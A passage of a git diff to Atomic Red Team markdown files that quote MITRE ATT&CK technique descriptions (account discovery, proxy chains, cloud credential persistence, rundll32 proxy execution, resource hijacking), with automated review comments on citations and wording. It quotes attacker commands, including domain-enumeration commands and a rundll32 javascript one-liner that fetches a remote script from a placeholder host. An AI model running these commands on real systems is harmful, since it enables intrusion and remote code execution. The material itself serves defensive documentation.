Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.
-Commands such as net user /domain
and net group /domain
of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)
+Commands such as net user /domain
and net group /domain
of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)
## Atomic Tests
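Review bot: the removed and added lines in this hunk are identical as rendered, so this is a whitespace-only change, most likely trailing whitespace or a CRLF/LF difference in the generated description; either drop the hunk or normalise line endings in the generator so future regenerations stop producing no-op diffs across description files.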
diff --git a/atomics/T1090.003/T1090.003.md b/atomics/T1090.003/T1090.003.md
index c8202f1d08..d90e1a03c6 100644
--- a/atomics/T1090.003/T1090.003.md
+++ b/atomics/T1090.003/T1090.003.md
@@ -2,9 +2,9 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1090/003)
Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
+For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations. (Citation: ORB Mandiant)
-In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
+In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
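Review bot: the new ORB sentence has a stray space before its citation marker (`operations. (Citation: ORB Mandiant)`), unlike the adjacent `(Citation: Onion Routing)` which is attached directly to the sentence; and the second `-`/`+` pair in this hunk, the network-infrastructure paragraph, is byte-identical as rendered, so that part is another whitespace-only change that should not be in the diff.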
diff --git a/atomics/T1098.001/T1098.001.md b/atomics/T1098.001/T1098.001.md
index a2d63e1c44..3494296ee1 100644
--- a/atomics/T1098.001/T1098.001.md
+++ b/atomics/T1098.001/T1098.001.md
@@ -2,14 +2,16 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1098/001)
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
-For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
+For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair
or ImportKeyPair
API in AWS or the gcloud compute os-login ssh-keys add
command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
-Adversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Azure AD environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation)
+Adversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
API in AWS to add a password that can be used to log into the AWS Management Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation: Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024) If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Entra ID environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation)
In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.
-(Citation: Crowdstrike AWS User Federation Persistence)
+(Citation: Crowdstrike AWS User Federation Persistence)
+
+In Entra ID environments with the app password feature enabled, adversaries may be able to add an app password to a user account.(Citation: Mandiant APT42 Operations 2024) As app passwords are intended to be used with legacy devices that do not support multi-factor authentication (MFA), adding an app password can allow an adversary to bypass MFA requirements. Additionally, app passwords may remain valid even if the user’s primary password is reset.(Citation: Microsoft Entra ID App Passwords)
## Atomic Tests
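Review bot: naming is inconsistent within this hunk: the first paragraph says "Azure / Entra ID" while the later paragraph and the new app-password paragraph say "Entra ID", and the T1072 hunk in this same change also uses plain "Entra ID"; pick one form. The `(Citation: Crowdstrike AWS User Federation Persistence)` line is a `-`/`+` pair with no visible difference, so that part is whitespace-only. The app-password paragraph itself should stay as written: it states the two properties a defender needs, MFA bypass and survival across a primary password reset.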
diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md
index 1a02dcb70e..747b46096a 100644
--- a/atomics/T1202/T1202.md
+++ b/atomics/T1202/T1202.md
@@ -1,6 +1,6 @@
# T1202 - Indirect Command Execution
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1202)
-Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
+Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index 9f624dba02..d6f4af07ed 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -1,6 +1,6 @@
# T1204.002 - User Execution: Malicious File
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1204/002)
-An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
+An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and .reg.
Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index 5380de78da..72225268d8 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1218/011)
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}
).
-Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
+Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"
This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
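Review bot: the appended sentence `For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe.` is the only new claim in this hunk without a citation marker, while every other statement in the paragraph carries one; if the upstream description has a reference for the ClickOnce-via-rundll32 case it should be attached here, otherwise a reader has no way to verify how ClickOnce and rundll32.exe relate.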
diff --git a/atomics/T1484.002/T1484.002.md b/atomics/T1484.002/T1484.002.md
index b25c360bee..bb918c9997 100644
--- a/atomics/T1484.002/T1484.002.md
+++ b/atomics/T1484.002/T1484.002.md
@@ -4,7 +4,7 @@
Manipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain)
-An adversary may also add a new federated identity provider to an identity tenant such as Okta, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023)
+An adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)
## Atomic Tests
diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index 3313bfc479..a3666e02e7 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -6,7 +6,7 @@ Adversaries may attempt to overwrite files and directories with randomly generat
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
-In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
## Atomic Tests
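Review bot: "database instances" is added to the list of deleted cloud infrastructure, but the two citations closing the sentence (Data Destruction - Threat Post, DOJ - Cisco Insider) are unchanged; confirm that one of them actually covers database deletion or add a source for the new item, otherwise the claim is unsupported as written.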
diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md
index 5f6a9d4b7b..1b2f780987 100644
--- a/atomics/T1489/T1489.md
+++ b/atomics/T1489/T1489.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1489)
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster)
-Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS
, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)
+Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation: Novetta Blockbuster) In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)
## Atomic Tests
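Review bot: the hard line break between `MSExchangeIS` and `, which will make Exchange content inaccessible` is carried over unchanged into the `+` lines, so the rendered sentence still has a stray newline before the comma; since the only substantive change here is moving the period after `(Citation: Novetta Blockbuster)`, join the two lines into one while touching them.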
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index f1f38978fb..ee101f433c 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -15,7 +15,7 @@ A number of native Windows utilities have been used by adversaries to disable or
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
-Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
## Atomic Tests
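Review bot: "database backups" is inserted into the list of disaster-recovery artifacts while the citations at the end of the sentence stay the same (Dark Reading Code Spaces Cyber Attack, Rhino Security Labs AWS S3 Ransomware); check that at least one of them describes database backup deletion, or attach a source that does.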
diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md
index 2b22d6b000..da3b239791 100644
--- a/atomics/T1496/T1496.md
+++ b/atomics/T1496/T1496.md
@@ -2,11 +2,14 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1496)
Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.
-One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
+Resource hijacking may take a number of different forms. For example, adversaries may:
-Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)
+* Leverage compute resources in order to mine cryptocurrency
+* Sell network bandwidth to proxy networks
+* Generate SMS traffic for profit
+* Abuse cloud-based messaging services to send large quantities of spam messages
-Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking)
+In some cases, adversaries may leverage multiple types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking 2023)
## Atomic Tests
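Review bot: the replacement drops every supporting citation but one: the removed paragraphs cited Kaspersky Lazarus, CloudSploit, Unit 42 Hildegard, Trend Micro (twice), GoBotKR and Sysdig Proxyjacking, while the four new bullets ("Leverage compute resources in order to mine cryptocurrency", "Sell network bandwidth to proxy networks", "Generate SMS traffic for profit", "Abuse cloud-based messaging services to send large quantities of spam messages") carry no citation at all and only the closing sentence cites Sysdig Cryptojacking Proxyjacking 2023. Give each bullet a citation, or a link in the style used elsewhere on these pages to the technique page it summarizes, so the claims stay sourced. The removed sentence about mining malware killing competing miners, and the botnet/torrent-seeding sentence with its [Network Denial of Service] link, are lost without replacement; that should be a deliberate choice rather than a side effect of the rewrite.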
diff --git a/atomics/T1526/T1526.md b/atomics/T1526/T1526.md
index 61f5297d34..9176b32fc1 100644
--- a/atomics/T1526/T1526.md
+++ b/atomics/T1526/T1526.md
@@ -1,8 +1,8 @@
# T1526 - Cloud Service Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1526)
-An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
-Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
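Review bot: the second `+` line now reads "Microsoft Graph API" but the trailing citation key is still `(Citation: Azure AD Graph API)`, so the text and its source no longer match; either keep the sentence about the Azure AD Graph API and note that it is deprecated, or update the citation to a Microsoft Graph reference. The Azure AD to Entra ID rename in the first `+` line is consistent with the other files in this diff.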
diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md
index 32415d148c..e0af1ce6e2 100644
--- a/atomics/T1552.004/T1552.004.md
+++ b/atomics/T1552.004/T1552.004.md
@@ -4,7 +4,7 @@
Adversaries may also look in common key directories, such as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
-When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)
+When a device is registered to Entra ID, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)
On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys)
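Review bot: the context lines above show `~/.ssh` and `for SSH keys on * nix-based systems` broken across lines, with a stray space in `* nix`; since this file is being edited, join those lines and write `*nix`. The Entra ID rename in the `+` line correctly leaves the citation key `AADInternals Azure AD Device Identities` alone, since citation keys are source titles rather than prose.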
diff --git a/atomics/T1562/T1562.md b/atomics/T1562/T1562.md
index 8108eb1164..b92ae40e5e 100644
--- a/atomics/T1562/T1562.md
+++ b/atomics/T1562/T1562.md
@@ -2,9 +2,9 @@
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562)
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
-Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
-Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
+
## Atomic Tests
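Review bot: in the merged paragraph, "These restrictions can further enable malicious operations as well as the continued propagation of incidents." now follows the newly inserted sentence about event aggregation and analysis mechanisms, so "these restrictions" sits one sentence away from the logout/shutdown/update restrictions it refers to; move the event-aggregation sentence after it, or reword to "These impairments". Also, the removed standalone paragraph is replaced by a bare `+` empty line, which likely leaves a stray blank line immediately before `## Atomic Tests`; drop it unless a blank line is intended there.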
diff --git a/atomics/T1572/T1572.md b/atomics/T1572/T1572.md
index 873cd14725..6cdd8219b0 100644
--- a/atomics/T1572/T1572.md
+++ b/atomics/T1572/T1572.md
@@ -6,7 +6,7 @@ There are various means to encapsulate a protocol within another protocol. For e
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19)
-Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure.
+Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure.
## Atomic Tests
diff --git a/atomics/T1574.001/T1574.001.md b/atomics/T1574.001/T1574.001.md
index e8b00cf0b9..9ca13a150d 100644
--- a/atomics/T1574.001/T1574.001.md
+++ b/atomics/T1574.001/T1574.001.md
@@ -4,7 +4,7 @@
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
-Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
diff --git a/atomics/T1606.002/T1606.002.md b/atomics/T1606.002/T1606.002.md
index cadc75da65..a7f83add4e 100644
--- a/atomics/T1606.002/T1606.002.md
+++ b/atomics/T1606.002/T1606.002.md
@@ -4,7 +4,7 @@
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
-An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
